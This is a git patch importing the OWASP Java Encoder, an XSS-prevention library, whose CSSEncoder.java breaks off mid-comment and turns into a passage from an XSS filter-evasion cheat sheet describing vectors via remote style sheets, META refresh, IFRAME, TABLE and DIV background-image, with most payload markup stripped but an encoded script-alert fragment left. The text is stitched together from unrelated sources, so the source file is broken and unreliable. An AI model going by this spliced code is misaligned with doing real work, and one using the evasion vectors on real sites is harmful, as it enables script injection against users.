From 5b28a40851d65b54b33638b9aad3015a5f53533e Mon Sep 17 00:00:00 2001 From: Jim Manico Date: Sun, 29 Mar 2015 14:14:11 -1000 Subject: initial move from google code --- COPYING | 33 + checkstyle.xml | 202 + core/pom.xml | 273 ++ .../src/main/java/org/owasp/encoder/ASCIIBits.java | 124 + .../main/java/org/owasp/encoder/CDATAEncoder.java | 314 ++ .../main/java/org/owasp/encoder/CSSEncoder.java | 299 ++ .../java/org/owasp/encoder/ChainedEncoder.java | 164 + core/src/main/java/org/owasp/encoder/Encode.java | 1402 ++++++ .../main/java/org/owasp/encoder/EncodedWriter.java | 232 + core/src/main/java/org/owasp/encoder/Encoder.java | 264 ++ core/src/main/java/org/owasp/encoder/Encoders.java | 201 + .../main/java/org/owasp/encoder/HTMLEncoder.java | 345 ++ .../main/java/org/owasp/encoder/JavaEncoder.java | 210 + .../java/org/owasp/encoder/JavaScriptEncoder.java | 305 ++ .../main/java/org/owasp/encoder/URIEncoder.java | 397 ++ core/src/main/java/org/owasp/encoder/Unicode.java | 84 + .../owasp/encoder/UnsupportedContextException.java | 53 + .../java/org/owasp/encoder/XMLCommentEncoder.java | 248 + .../main/java/org/owasp/encoder/XMLEncoder.java | 406 ++ .../test/java/org/owasp/encoder/BenchmarkTest.java | 260 ++ .../java/org/owasp/encoder/CDATAEncoderTest.java | 99 + .../java/org/owasp/encoder/CSSEncoderTest.java | 90 + .../java/org/owasp/encoder/ChainedEncoderTest.java | 72 + .../test/java/org/owasp/encoder/EncodeTest.java | 160 + .../org/owasp/encoder/EncoderTestSuiteBuilder.java | 562 +++ .../test/java/org/owasp/encoder/EncodersTest.java | 73 + .../java/org/owasp/encoder/HTMLEncoderTest.java | 104 + .../java/org/owasp/encoder/JavaEncoderTest.java | 76 + .../org/owasp/encoder/JavaScriptEncoderTest.java | 126 + .../java/org/owasp/encoder/URIEncoderTest.java | 130 + .../org/owasp/encoder/XMLCommentEncoderTest.java | 101 + .../java/org/owasp/encoder/XMLEncoderTest.java | 138 + .../org/owasp/encoder/benchmark-data-1.txt | 427 ++ .../org/owasp/encoder/benchmark-data-2.txt | 4921 ++++++++++++++++++++ esapi/pom.xml | 224 + .../java/org/owasp/encoder/esapi/ESAPIEncoder.java | 240 + .../org/owasp/encoder/esapi/ESAPIEncoderTest.java | 49 + esapi/src/test/resources/.esapi/ESAPI.properties | 1 + jsp/pom.xml | 243 + .../java/org/owasp/encoder/tag/EncodingTag.java | 57 + .../java/org/owasp/encoder/tag/ForCDATATag.java | 52 + .../org/owasp/encoder/tag/ForCssStringTag.java | 52 + .../java/org/owasp/encoder/tag/ForCssUrlTag.java | 52 + .../org/owasp/encoder/tag/ForHtmlAttributeTag.java | 52 + .../org/owasp/encoder/tag/ForHtmlContentTag.java | 52 + .../java/org/owasp/encoder/tag/ForHtmlTag.java | 52 + .../encoder/tag/ForHtmlUnquotedAttributeTag.java | 52 + .../encoder/tag/ForJavaScriptAttributeTag.java | 52 + .../owasp/encoder/tag/ForJavaScriptBlockTag.java | 52 + .../owasp/encoder/tag/ForJavaScriptSourceTag.java | 52 + .../org/owasp/encoder/tag/ForJavaScriptTag.java | 52 + .../org/owasp/encoder/tag/ForUriComponentTag.java | 53 + .../main/java/org/owasp/encoder/tag/ForUriTag.java | 52 + .../org/owasp/encoder/tag/ForXmlAttributeTag.java | 52 + .../org/owasp/encoder/tag/ForXmlCommentTag.java | 52 + .../org/owasp/encoder/tag/ForXmlContentTag.java | 52 + .../main/java/org/owasp/encoder/tag/ForXmlTag.java | 52 + .../resources/META-INF/java-encoder-advanced.tld | 560 +++ jsp/src/main/resources/META-INF/java-encoder.tld | 403 ++ .../org/owasp/encoder/tag/EncodingTagTest.java | 77 + .../org/owasp/encoder/tag/ForCDATATagTest.java | 77 + .../org/owasp/encoder/tag/ForCssStringTagTest.java | 77 + .../org/owasp/encoder/tag/ForCssUrlTagTest.java | 77 + .../owasp/encoder/tag/ForHtmlAttributeTagTest.java | 77 + .../owasp/encoder/tag/ForHtmlContentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForHtmlTagTest.java | 77 + .../tag/ForHtmlUnquotedAttributeTagTest.java | 77 + .../encoder/tag/ForJavaScriptAttributeTagTest.java | 77 + .../encoder/tag/ForJavaScriptBlockTagTest.java | 77 + .../encoder/tag/ForJavaScriptSourceTagTest.java | 77 + .../owasp/encoder/tag/ForJavaScriptTagTest.java | 46 + .../owasp/encoder/tag/ForUriComponentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForUriTagTest.java | 77 + .../owasp/encoder/tag/ForXmlAttributeTagTest.java | 77 + .../owasp/encoder/tag/ForXmlCommentTagTest.java | 77 + .../owasp/encoder/tag/ForXmlContentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForXmlTagTest.java | 77 + pom.xml | 126 + 78 files changed, 17038 insertions(+) create mode 100644 COPYING create mode 100644 checkstyle.xml create mode 100644 core/pom.xml create mode 100644 core/src/main/java/org/owasp/encoder/ASCIIBits.java create mode 100644 core/src/main/java/org/owasp/encoder/CDATAEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/CSSEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/ChainedEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Encode.java create mode 100644 core/src/main/java/org/owasp/encoder/EncodedWriter.java create mode 100644 core/src/main/java/org/owasp/encoder/Encoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Encoders.java create mode 100644 core/src/main/java/org/owasp/encoder/HTMLEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/JavaEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/URIEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Unicode.java create mode 100644 core/src/main/java/org/owasp/encoder/UnsupportedContextException.java create mode 100644 core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/XMLEncoder.java create mode 100644 core/src/test/java/org/owasp/encoder/BenchmarkTest.java create mode 100644 core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/CSSEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/ChainedEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/EncodeTest.java create mode 100644 core/src/test/java/org/owasp/encoder/EncoderTestSuiteBuilder.java create mode 100644 core/src/test/java/org/owasp/encoder/EncodersTest.java create mode 100644 core/src/test/java/org/owasp/encoder/HTMLEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/JavaEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/JavaScriptEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/URIEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/XMLCommentEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/XMLEncoderTest.java create mode 100644 core/src/test/resources/org/owasp/encoder/benchmark-data-1.txt create mode 100644 core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt create mode 100644 esapi/pom.xml create mode 100644 esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java create mode 100644 esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java create mode 100644 esapi/src/test/resources/.esapi/ESAPI.properties create mode 100644 jsp/pom.xml create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java create mode 100644 jsp/src/main/resources/META-INF/java-encoder-advanced.tld create mode 100644 jsp/src/main/resources/META-INF/java-encoder.tld create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlContentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlTagTest.java create mode 100755 pom.xml diff --git a/COPYING b/COPYING new file mode 100644 index 0000000..51d2e0e --- /dev/null +++ b/COPYING @@ -0,0 +1,33 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/checkstyle.xml b/checkstyle.xml new file mode 100644 index 0000000..530c5a9 --- /dev/null +++ b/checkstyle.xml @@ -0,0 +1,202 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/core/pom.xml b/core/pom.xml new file mode 100644 index 0000000..917768b --- /dev/null +++ b/core/pom.xml @@ -0,0 +1,273 @@ + + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2-SNAPSHOT + + + encoder + 1.2-SNAPSHOT + jar + + OWASP Encoders + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + + + org.apache.maven.plugins + maven-surefire-plugin + 2.12 + + + org/owasp/encoder/BenchmarkTest.java + + + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.2 + + + 85 + 85 + false + 85 + 85 + 85 + 85 + + + + + + clean + + + + + + org.apache.maven.plugins + maven-source-plugin + 2.2.1 + + + attach-sources + package + + jar + + + + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.9 + + + attach-javadocs + package + + jar + + + + + + org.apache.maven.plugins + maven-site-plugin + 3.2 + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.6 + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + 1.3.1 + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + 2.3 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.12.4 + + + + report-only + failsafe-report-only + + + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.1 + + + org.apache.maven.plugins + maven-pmd-plugin + 2.7.1 + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.9 + + + default + + javadoc + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + 2.9.1 + + ../checkstyle.xml + basedir=${basedir}/.. + + + + org.codehaus.mojo + findbugs-maven-plugin + 2.5.2 + + + + + + + + + + + junit + junit + 3.8.1 + test + + + + + + benchmark + + + + org.apache.maven.plugins + maven-failsafe-plugin + 2.12.4 + + + org/owasp/encoder/BenchmarkTest.java + + + + + + integration-test + verify + + + + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + + diff --git a/core/src/main/java/org/owasp/encoder/ASCIIBits.java b/core/src/main/java/org/owasp/encoder/ASCIIBits.java new file mode 100644 index 0000000..33a3a33 --- /dev/null +++ b/core/src/main/java/org/owasp/encoder/ASCIIBits.java @@ -0,0 +1,124 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder; + +/** + * ASCIIBits - Small helper class for building up 128-bit bit-mask (2 longs) + * to be used testing lower-ASCII characters. It helps make some other code + * easier to read. It is not intended to be public. + */ +class ASCIIBits { + /** Lower 64 bits. */ + long _lowerMask; + /** Upper 64 bits. */ + long _upperMask; + + /** + * Sets a bit to 1 for each character in the argument string. No checking + * is performed to see if characters are in the valid range 0..127. + * + * @param chars the characters to set to 1. + * @return {@code this} + */ + ASCIIBits set(String chars) { + for (int i=0, n=chars.length() ; i". This encoder removes invalid XML + * characters, and encodes "]]>" (to "]]>]]<![CDATA[>"). The result is + * that the data integrity is maintained, but the code receiving the output + * will have to handle multiple CDATA events with character events between. + * As an alternate approach, the caller could pre-encode "]]>" to something + * of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use + * this encoder to remove any invalid XML characters. + * + * @author Jeff Ichnowski + */ +class CDATAEncoder extends Encoder { + + /** The encoding of @{code "]]>"}. */ + private static final char[] CDATA_END_ENCODED = + "]]>]]".toCharArray(); + + /** Length of {@code "]]>]]"}. */ + private static final int CDATA_END_ENCODED_LENGTH = 15; + + /** Length of {@code "]]>"}. */ + private static final int CDATA_END_LENGTH = 3; + + @Override + protected int maxEncodedLength(int n) { + // "]" becomes "]" (1 -> 1) + // "]]" becomes "]]" (2 -> 2) + // "]]>" becomes "]]>]]" (3 -> 15) + // "]]>]" becomes "]]>]]]" (3 -> 15 + 1 -> 1) + // ... + + int worstCase = n / CDATA_END_LENGTH; + int remainder = n % CDATA_END_LENGTH; + + return worstCase * CDATA_END_ENCODED_LENGTH + remainder; + +// return (n - remainder) * 5 + remainder; + } + + @Override + protected int firstEncodedOffset(String input, int off, int len) { + final int n = off + len; + int closeCount = 0; + for (int i=off ; i= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { + // valid + } else { + return i; + } + } else { + if (i+1 < n) { + if (input.charAt(i+1) != ']') { + // "]x" (next character is safe for this to be ']') + } else { + // "]]?" + // keep looping through ']' + for ( ; i+2 < n && input.charAt(i+2) == ']' ; ++i) { + // valid + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i+2 < n) { + if (input.charAt(i+2) == '>') { + return i; + } else { + // valid + } + } else { + return n; + } + } + } else { + return n; + } + } + } else if (ch < Character.MIN_HIGH_SURROGATE) { + if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { + // valid + } else { + return i; + } + } else if (ch <= Character.MAX_HIGH_SURROGATE) { + if (i+1 < n) { + if (Character.isLowSurrogate(input.charAt(i+1))) { + int cp = Character.toCodePoint(ch, input.charAt(i+1)); + if (Unicode.isNonCharacter(cp)) { + return i; + } else { + ++i; + // valid pair + } + } else { + return i; + } + } else { + // end of input, high without low = invalid + return i; + } + } else if ( + // low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE || + // non characters + ch > '\ufffd' || + ('\ufdd0' <= ch && ch <= '\ufdef')) + { + return i; + } else { + // valid + } + + } + return n; + } + + @Override + protected CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { + final char[] in = input.array(); + final char[] out = output.array(); + int i = input.arrayOffset() + input.position(); + final int n = input.arrayOffset() + input.limit(); + int j = output.arrayOffset() + output.position(); + final int m = output.arrayOffset() + output.limit(); + + for ( ; i= m) { + return overflow(input, i, output, j); + } + if (ch >= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { + out[j++] = ch; + } else { + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else { + if (i+1 < n) { + if (in[i+1] != ']') { + // "]x" (next character is safe for this to be ']') + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } else { + // "]]?" + // keep looping through ']' + for ( ; i+2 < n && in[i+2] == ']' ; ++i) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i+2 < n) { + if (in[i+2] == '>') { + if (j+CDATA_END_ENCODED_LENGTH > m) { + return overflow(input, i, output, j); + } + System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); + j += CDATA_END_ENCODED_LENGTH; + i += 2; + } else { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } + } else if (endOfInput) { + if (j+2 > m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + out[j++] = ']'; + i = n; + break; + } else { + break; + } + } + } else if (endOfInput) { + // seen "]", then end of input. + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + i++; + break; + } else { + break; + } + } + } else if (ch < Character.MIN_HIGH_SURROGATE) { + if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + } else { + // C1 control code + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (ch <= Character.MAX_HIGH_SURROGATE) { + if (i+1 < n) { + if (Character.isLowSurrogate(in[i+1])) { + int cp = Character.toCodePoint(ch, in[i+1]); + if (Unicode.isNonCharacter(cp)) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + ++i; + } else { + if (j+1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + out[j++] = in[++i]; + } + } else { + // high without low + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (endOfInput) { + // end of input, high without low = invalid + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } else { + break; + } + } else if ( + // low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE || + // non characters + ch > '\ufffd' || + ('\ufdd0' <= ch && ch <= '\ufdef')) + { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } else { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + } + + } + + return underflow(input, i, output, j); + } + + @Override + public String toString() { + return "CDATAEncoder"; + } +} diff --git a/core/src/main/java/org/owasp/encoder/CSSEncoder.java b/core/src/main/java/org/owasp/encoder/CSSEncoder.java new file mode 100644 index 0000000..00ea4c0 --- /dev/null +++ b/core/src/main/java/org/owasp/encoder/CSSEncoder.java @@ -0,0 +1,299 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder; + +import java.nio.CharBuffer; +import java.nio.charset.CoderResult; + +/** + * CSSEncoder -- Encoder for Cascading-Style-Sheet string and URI contexts. + * Other contexts, such as color, number (w/unit), etc... are not good targets + * for "encoding" (e.g. you cannot encode the string "XYZ" into a number), + * they should instead by validated through other means (such as regular + * expressions). + */ +class CSSEncoder extends Encoder { + + /** Number of bits in a {@code long}. */ + static final int LONG_BITS = 64; + + /** Length of hex encoding with trailing space {@code "\## "}. */ + static final int HEX_ENCODED_LENGTH = 4; + + /** + * Encoding mode of operation--specified the set of characters that + * required encoding. + */ + static enum Mode { + /** + * String contexts. Characters between quotes. + * + * 
+         *   Not allowed: \n \r \f \\ " '  (everything else is allowed)
+         *   Allows: "\\{nl}" (escaped newline)
+         *
+ */ + STRING(new ASCIIBits().set(' ', '~').clear("\"\'<&/\\>")), + + /** + * URL context. Characters inside a "url(...)". + * + * 
+         *   Allowed: [!#$%&*-\[\]-~]|{nonascii}|{escape}
+         *   Escapes: \\[0-9a-f]{1,6}(\s?)
+         *            \\[^\n\r\f0-9a-f]
+         *
+ */ + URL(new ASCIIBits().set("!#$%").set('*', '[').set(']', '~').clear("/<>")), + + // In both contexts above '<' is added to protect embedded tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world: + +Remote style sheet part 3 +. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to +RFC2616 +setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: ; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox: + +Remote style sheet part 4 +. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites: + +Local htc file +. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute: + +List-style-image +. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector: +
  • XSS +VBscript +in an image: + +Mocha +(older versions of Netscape only): + +Livescript + +US-ASCII +encoding (found by +Kurt Huwig +). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at +my charsets issues +page: +¼script¾alert(¢XSS¢)¼/script¾ +META +(the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs): + +META using data: directive +URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see +RFC 2397 +for more details or go +or +to encode your own. You can also use the +below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method: + +META with additional URL parameter +. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by +Moritz Naumann +): + +IFRAME +(if iframes are allowed there are a lot of other XSS problems as well): + +FRAME +(frames have the same sorts of XSS problems as iframes): + +TABLE +(who would have thought tables were XSS targets... except me, of course): + +TD +(just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors): +
    +DIV background-image +
    +DIV background-image with unicoded XSS +exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by +Renaud Lifchitz +as a vulnerability in Hotmail: +
    +DIV background-image plus extra characters +. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279): +
    +DIV expression +- a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression": +
